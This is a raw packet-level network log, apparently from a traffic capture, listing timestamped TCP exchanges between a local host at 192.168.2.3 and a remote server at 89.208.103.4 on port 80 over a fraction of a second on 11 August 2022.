Aug 11, 2022 06:57:07.443214893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443254948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443281889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443290949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443306923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443331003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443331957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443391085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443393946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443437099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443454027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443475962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443500996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443519115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.443531036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.443579912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444252014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444288969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444314003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444327116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444341898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444367886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444395065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444410086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444442034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444449902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444483995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444489002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444495916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444526911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.444551945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.444583893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445317984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445358038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445389032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445399046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445425987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445436001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445444107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445476055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445504904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445514917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445542097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445554972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445566893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445595980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.445626974 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.445667028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446345091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446382046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446418047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446424007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446450949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446464062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446475029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446502924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446521044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446542978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446558952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446583033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446600914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446630955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446877956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446918011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446947098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446954012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.446959019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.446993113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447016954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447031975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447076082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447124958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447387934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447431087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447464943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447467089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447496891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447506905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447525978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447546959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447580099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447583914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447611094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447638035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.447926044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447967052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.447994947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448004961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448019981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448045015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448076010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448085070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448110104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448122978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448139906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448163986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448179960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448203087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448215008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448240995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448268890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448299885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448498011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448539019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448564053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448579073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448596954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448616982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.448628902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448678017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.448961973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.449001074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.449033022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.449038029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.449069977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.449078083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.449098110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.449141026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.449491978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.449512959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.449553967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.450475931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.450561047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.450634956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.451042891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.451113939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.453229904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453260899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453291893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453301907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.453325033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453351974 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.453381062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.453684092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453715086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453744888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.453747034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.453761101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.453798056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.454282045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.454313040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.454344034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.454368114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.454718113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.454751015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.454782009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.454804897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.455239058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455271006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455301046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455331087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455363989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.455406904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.455768108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455800056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455827951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.455832958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.455854893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.455873013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.456310987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456341028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456372023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456381083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.456401110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.456406116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456418991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.456463099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.456803083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456835032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456864119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456866026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.456895113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.456924915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.457056046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.457134008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.459475994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.459507942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.459538937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.459539890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.459578037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.459598064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.459953070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.459985971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.460016012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.460036039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.460464001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.460493088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.460524082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.460525036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.460551023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.460557938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.460567951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.460612059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.461028099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.461060047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.461088896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.461092949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.461113930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.461133957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.461503029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.461534023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.461565971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.461586952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462063074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462095976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462124109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462125063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462150097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462158918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462165117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462212086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462572098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462601900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462632895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.462634087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462676048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.462696075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.463083982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.463145971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.469471931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.469525099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.469558954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.469558954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.469587088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.469607115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.469933033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.469970942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.470005035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.470005989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.470022917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.470040083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.470056057 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.470088959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.471508026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.471590042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.472021103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.472059011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.472084045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.472090960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.472125053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.472142935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.472543001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.472584963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.472615004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.472618103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.472647905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.472677946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.473043919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.473067045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.473088026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.473099947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.473119020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.473138094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.473573923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.473603010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.473644018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.473660946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.474080086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.474104881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.474139929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.474162102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.474709034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.474741936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.474752903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.474786043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.474889040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475193977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475218058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475239038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475260973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475261927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475276947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475294113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475305080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475693941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475718975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475740910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.475749016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475773096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.475788116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.476197004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.476222038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.476244926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.476252079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.476267099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.476296902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.476316929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.476708889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.476733923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.476771116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.476788044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.480959892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.480993986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.481015921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.481048107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.481076956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.481429100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.481453896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.481487989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.481491089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.481524944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.481544971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.483602047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.483627081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.483674049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.483697891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.484090090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.484107971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.484122992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.484138012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.484150887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.484165907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.484205008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485127926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485148907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485163927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485181093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485193014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485203028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485208988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485229015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485244989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485248089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485260963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485272884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485277891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485296965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485302925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485315084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485331059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485342979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485347986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485351086 CEST	49736	80	192.168.2.3	89.208.103.4
